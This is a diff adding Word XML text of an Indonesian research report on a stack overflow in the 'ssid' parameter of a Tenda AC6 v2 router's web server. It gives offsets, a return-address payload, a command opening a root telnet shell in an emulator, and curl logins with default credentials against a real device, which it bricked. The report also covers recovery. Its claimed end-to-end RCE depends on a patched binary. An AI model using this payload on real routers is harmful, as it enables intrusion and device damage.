+        <w:br/>
+        <w:t>saved $ra di fp+892     ; offset 748 dari fp+0x90</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>GDB breakpoint setelah strcpy kedua membaca `fp+892 = 0x44434241` untuk payload `748×'A'+'ABCD'` → **offset 748 TERKONFIRMASI**.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Teknik L=751: `ssid=` + 748×'A' + bytes `c0 47 50` (751 byte, tanpa NUL eksplisit). Null-terminator jatuh di `fp+895`, sehingga `$ra = 0x005047c0` (`system`) DAN `req` di `fp+896` tetap utuh (L≥752 akan men-NUL-kan `req` → crash lebih awal).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>POST overflow → `http=000`/`rc=52`, `httpd` mati (crash reproduksibel). Kernel log: `epc=0x430268` (`websGetVar`), `BadVA` sesuai pointer rusak.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="LightGrid-Accent1"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4320"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Hasil</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`ssid=TESTPROBE` (pendek)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Handler jalan; respons tergantung state CFM (bisa 200/302/hang).</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`ssid=`+748×'A'+`ABCD` (752B)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`fp+892=0x44434241` (gdb); crash.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`ssid=`+748×'A'+`c0 47 50` (751B)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`fp+892=0x005047c0`; crash (a0 tak terkontrol / frame terkoyak).</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Uji SELALU dari container ke `127.0.0.1:8080` (hostfwd guest), tidak pernah ke `192.168.0.1` via NAT. Verifikasi rute (`ip route get`) sebelum tiap sesi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4. Status RCE — SELESAI (End-to-End Terbukti)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Primitif tulis `$ra` 100% di tangan dan aman diuji di emulator (tanpa hardware).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Blocker lama (handler crash sebelum epilog karena `GetValue` CFM mengembalikan data garbage) TERATASI dengan menjalankan `cfm_mib_dgram` (server DGRAM) + libCfm ORIGINAL, sehingga nil CFM pendek/valid dan `req` tidak lagi rusak.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RCE lengkap BERHASIL: `system()` dipanggil dengan `$a0` menunjuk string perintah buatan penyerang melalui trik hook epilog + gua kode (lihat §6).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Hasil: `telnetd -l /bin/sh -p 2323` dijalankan → shell interaktif ROOT pada port 2323 (hostfwd).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5. Konfirmasi End-to-End RCE (bukti)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Rantai final: auth-bypass (user/user) → overflow `ssid` (offset 748) → saved `$ra`=0x005047c0 (system) → hook epilog `0x00477ddc` = `j 0x0050b3d0` → gua RCE memuat `$a0`='telnetd -l /bin/sh -p 2323', `$t9`=system → `system(cmd)` → telnetd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Payload: ssid = 'A'*748 + bytes(c0 47 50)   # 751 byte (NUL implisit aman)</w:t>
+        <w:br/>
+        <w:t>Hook  : 0x00477ddc: j 0x0050b3d0 ; nop     # file offset 0x10b3d0 -&gt; vaddr = 0x400000+0x10b3d0 = 0x0050b3d0</w:t>
+        <w:br/>
+        <w:t>Gua   : cek lw t0,892(s8)==0x5047c0 -&gt; a0=0x0050b450 (cmd); t9=system; ra=0x477de4; jr t9</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="LightGrid-Accent1"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4320"/>
+        <w:gridCol w:w="4320"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Uji</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Hasil</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`uname -a` di shell 2323</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`Linux (none) 4.1.17+ #28 ... mips GNU/Linux`</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`echo RCE-PWNED-AC6V2`</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tercetak (eksekusi perintah terbukti)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>`ls /` / `ps w`</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>rootfs firmware / daftar proses guest</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>shell `/ #`</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4320"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>ROOT interaktif di guest</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Artefak: evidence/rce_final/ (`httpd_rce`, `cave_final.s`, `cave_code.bin`, `payload_ssid.bin`, `libCfm_original.so`, `cfm_mib_dgram`, `rc.g`) + evidence/rce_shell_2323.txt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Catatan koreksi penting: vaddr = file offset + 0x400000 pada LOAD pertama httpd. Kesalahan awal memakai 0x410b3d0 (bukan 0x0050b3d0) menyebabkan SIGSEGV `invalid read from 0410b3d0`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6. Aturan Aman (Checklist)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Isolasi: user-net/hostfwd + DROP egress ke subnet lab; verifikasi `ip route get &lt;target&gt;` menunjuk tap/hostfwd, BUKAN `eth0`/NAT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Deteksi crash via HTTP (`http=000`/timeout) + `epc` kernel, BUKAN ping (crash userspace tak menjatuhkan ping).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Jangan kirim `loginPwd`/setter ke perangkat dipakai; di emulator pun catat perubahan config tiap sesi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Siapkan selalu firmware resmi + mode recovery + (ideal) UART sebelum sentuh hardware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="888888"/>
+          <w:sz w:val="44"/>
+        </w:rPr>
+        <w:t>BAGIAN VI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="0B3D91"/>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Uji di Perangkat Asli &amp; Pemulihan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Bagian ini mencatat uji langsung pada perangkat lab (router sendiri), hasilnya, kesalahan yang terjadi (perangkat sempat tidak boot), serta prosedur pemulihannya. Data pribadi diredaksi. Ditulis apa adanya sebagai pelajaran metodologi: pembuktian eksploit WAJIB di emulasi/isolasi dulu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>1. Ringkasan Satu Halaman</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Target uji: router Tenda AC6 v2 (RTL8197F, firmware V15.03.06.51_multi), LAN 192.168.0.1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Primitif yang diuji: stack overflow pada parameter `ssid` endpoint /goform/fast_setting_wifi_set; saved $ra di fp+892 → offset 748 (via strcpy ke fp+0x90); target $ra = system @ 0x005047c0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Hasil: overflow TIDAK pernah tercapai di perangkat asli. Handler justru menulis config/CFG dengan `ssid` panjang tak valid (≤500 byte dijawab `{"errCode":0}`), lalu koneksi drop (`http=000`) saat `ssid` ≥600 byte.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Akibat: CFG rusak → perangkat gagal membawa LAN/WiFi saat boot (perangkat tampak 'mati').</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pemulihan: Emergency/Recovery Web Mode (bootloader) + firmware resmi Tenda; alternatif TFTP/UART.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pelajaran: untuk eksploit memori, gunakan emulasi/harness lebih dulu; jangan pernah mengirim payload ke perangkat produksi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>2. Recon Perangkat Asli</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Perangkat merespons normal sebelum uji (ping 0% loss, /login.html 200). Autentikasi dapat dilewati dengan kredensial dasar `user:user`:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>$ curl -si -d 'username=user&amp;password=user' http://192.168.0.1/login/Auth</w:t>
+        <w:br/>
+        <w:t>HTTP/1.0 302 Redirect</w:t>
+        <w:br/>
+        <w:t>Set-Cookie: password=&lt;SESSION-TOKEN&gt;; path=/</w:t>
+        <w:br/>
+        <w:t>Location: http://192.168.0.1/main.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Cookie sesi valid dipakai untuk goform. Uji read-only:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>$ curl -si -H 'Cookie: password=&lt;SESSION-TOKEN&gt;' -X POST \</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">    http://192.168.0.1/goform/getProduct</w:t>
+        <w:br/>
+        <w:t>HTTP/1.1 200 OK</w:t>
+        <w:br/>
+        <w:t>{"product":"f1203","accessType":"1"}</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t># tanpa cookie -&gt; HTTP/1.0 302 Redirect ke login.html (sesi wajib)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kesimpulan: sesi user:user benar-benar mengesahkan request goform (bukan sekadar Set-Cookie kosong).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>3. Analisis Handler (disasm bin/httpd)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Fungsi `form_fast_setting_wifi_set` @ 0x00477c20 (fast_setting.c):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>0x00477d08  lw   a0, arg0(req)</w:t>
+        <w:br/>
+        <w:t>0x00477d10  addiu a1, v0, -0x1180        ; "ssid"</w:t>
+        <w:br/>
+        <w:t>0x00477d24  jalr websGetVar              ; ssid = websGetVar(req,"ssid",&lt;default&gt;)</w:t>
+        <w:br/>
+        <w:t>0x00477d38  lb   v0, 0(v0)</w:t>
+        <w:br/>
+        <w:t>0x00477d3c  bnez v0, 0x477d98            ; non-kosong -&gt; lanjut</w:t>
+        <w:br/>
+        <w:t>0x00477d48  "%s [%d] no ssid set, just return."</w:t>
+        <w:br/>
+        <w:t>0x00477d78  websRedirect(req, "login.html")   ; KOSONG -&gt; redirect login</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>0x00477d98  strcpy(fp+0x50, ssid)        ; buffer 64 byte</w:t>
+        <w:br/>
+        <w:t>0x00477dbc  strcpy(fp+0x90, ssid)        ; buffer 64 byte (write terakhir)</w:t>
+        <w:br/>
+        <w:t>0x00478698  lw   ra, 892(sp)             ; saved $ra (offset 748 dari fp+0x90)</w:t>
+        <w:br/>
+        <w:t>0x004786a4  jr   ra</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Syarat masuk ke jalur rentan: parameter `ssid` harus NON-KOSONG.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Offset $ra = 892 - 144 = 748 (strcpy kedua yang menang). Target null-safe 0x005047c0 (system).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4. Eksperimen Batas Panjang ssid (hasil nyata)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Body hanya berisi `ssid=&lt;N x 'A'&gt;` (tanpa parameter lain), cookie sesi valid, metode POST:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="LightGrid-Accent1"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Panjang ssid (N)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>HTTP</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Balasan / Catatan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>64, 128, 200, 255, 256, 300, 400, 500</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>{"errCode":0} (handler memproses)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>600, 640, 700, 748, 752, 800</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>000</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tidak ada balasan (koneksi drop / httpd crash)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Offset teoretis 748 tidak pernah diuji bersih: pada N≥600 koneksi sudah drop lebih dulu. Artinya ada batas lain (parser/commit/intermediate buffer) sebelum saved $ra tercapai.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Uji pendahuluan: `ssid=TESTPROBE` (9 byte) → 200 {"errCode":0}; GET dengan query `?ssid=...` → 302 (handler hanya memproses body POST).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Payload awal kita (`ssid=` + 748×'A' + bytes c0 47 50 + parameter lain) dijawab 302 — kemungkinan karena byte non-ASCII atau penolakan panjang, sehingga handler menganggap ssid kosong.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5. Apa yang Sebenarnya Terjadi (Root Cause 'Brick')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Setiap `ssid` panjang yang diterima (≤500 B) ditulis/di-commit ke partisi CFG, bukan sekadar dicoba di buffer stack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Nilai `ssid` yang panjang/aneh membuat boot berikutnya gagal memuat konfigurasi jaringan (CFM/MIB) → LAN dan WiFi tidak naik; perangkat tampak mati.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ini BUKAN kerusakan bootloader/firmware: bootloader tetap sehat (dibuktikan dengan masih bisa masuk Emergency Web Mode). Yang rusak hanya data konfigurasi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Pelajaran penting: endpoint 'setter' seperti ini memvalidasi/menyimpan input ke NVRAM/CFG, jadi efek sampingnya bisa jauh lebih besar daripada sekadar crash proses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6. Prosedur Pemulihan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6.1 Emergency / Recovery Web Mode (metode utama)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cabut daya. Sambungkan PC ke port LAN pakai kabel; set IP statis PC 192.168.0.2 / 255.255.255.0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Tekan-tahan tombol RESET, lalu colokkan daya sambil tetap ditahan ±10–15 detik sampai semua LED berkedip.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lepas RESET; tunggu LED port LAN menyala stabil.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Buka browser http://192.168.0.1 (bila perlu coba http://192.168.0.10) → halaman recovery muncul.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Unggah firmware resmi, tunggu selesai. Jangan cabut daya saat proses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6.2 Firmware resmi yang disiapkan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
